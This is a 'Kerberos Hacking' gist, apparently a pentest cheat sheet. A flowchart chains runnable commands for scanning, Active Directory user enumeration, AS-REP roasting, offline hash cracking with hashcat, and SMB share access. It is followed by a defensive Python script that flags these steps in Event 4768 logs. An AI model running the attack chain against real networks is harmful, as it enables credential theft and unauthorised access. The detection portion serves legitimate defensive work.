graph TD
kerberos-hacking-v1
1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
A[is kerberos running? -- typically port 88] --> B
B[find Active Directory domain names] -->|enum4linux $IP| C
C[enumerate AD users] --> |kerbrute userenum --dc $IP -d $AD-DOMAIN /path/to/wordlist.txt| D
D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
G[connect to SMB shares] --> |smbclient -U $AD-DOMAIN/$AD-USER //$IP/$DIR| H
H[look for further data]
Last active
February 26, 2022 15:35
Kerberos Hacking
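
A defender's view of steps C and D of the flowchart above, as an added example that is not part of the original gist: on the domain controller, username enumeration appears as a burst of Event ID 4768 failures with status 0x6 from one source, and an AS-REP request for an account without pre-authentication appears as a successful 4768 with PreAuthType 0. The JSON-lines export shape, the sample events, the account names and the threshold are constructed assumptions.

```python
import json
from collections import defaultdict

# Constructed sample: Event ID 4768 records flattened to JSON lines, keyed by
# the EventData field names Windows uses for this event.
SAMPLE = """\
{"EventID": 4768, "TargetUserName": "alice", "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.21"}
{"EventID": 4768, "TargetUserName": "admin", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.0.99"}
{"EventID": 4768, "TargetUserName": "backup", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.0.99"}
{"EventID": 4768, "TargetUserName": "test", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.0.99"}
{"EventID": 4768, "TargetUserName": "alcie", "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.0.21"}
{"EventID": 4768, "TargetUserName": "svc-legacy", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.99"}
"""

ENUM_THRESHOLD = 3  # assumption: distinct unknown names per source; tune per environment


def analyze(lines, enum_threshold=ENUM_THRESHOLD):
    """Return (enumeration sources, TGTs issued without pre-authentication)."""
    unknown = defaultdict(set)  # source IP -> names the KDC did not recognise
    no_preauth = []             # (user, source IP, ticket encryption type)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4768:
            continue
        src = ev.get("IpAddress", "").replace("::ffff:", "")
        user = ev.get("TargetUserName", "")
        status = int(ev.get("Status", "0x0"), 16)
        if status == 0x6:  # KDC_ERR_C_PRINCIPAL_UNKNOWN: the name does not exist
            unknown[src].add(user.lower())
        elif status == 0 and ev.get("PreAuthType") == "0":
            # TGT issued with no pre-authentication: the AS-REP is crackable offline
            no_preauth.append((user, src, ev.get("TicketEncryptionType")))
    enum_sources = {s: sorted(n) for s, n in unknown.items() if len(n) >= enum_threshold}
    return enum_sources, no_preauth


if __name__ == "__main__":
    sources, roastable = analyze(SAMPLE.splitlines())
    for src, names in sources.items():
        print(f"possible user enumeration from {src}: {names}")
    for user, src, etype in roastable:
        print(f"TGT without pre-auth for {user} from {src} (etype {etype})")
```

These events are only logged when the "Audit Kerberos Authentication Service" subcategory records both success and failure. Accounts that legitimately have pre-authentication disabled will also match the second check, so treat hits as candidates and review whether the account still needs that setting.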